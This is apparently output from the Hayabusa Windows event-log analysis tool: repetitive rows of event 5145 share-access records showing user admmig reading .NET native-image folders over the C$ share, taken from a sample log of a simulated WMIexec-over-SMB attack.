2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b#\ee04d39ed856041bef2381a968f3c2b9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind412bbddf#\cf3e7fb699d07208e389d8d3e5c3e3b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\635558b506364815e8348217e86fdf99 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.197 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Work0493292f#\b8d89e2f35d492e69789bd504270dff4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workca489553#\2af2b08e949ae5ebe946684d477a50d5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workd8194f73#\e75ae269d8eb8c8fb7bdcce4082ff8c2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:31.235 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Workfffcbcd8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
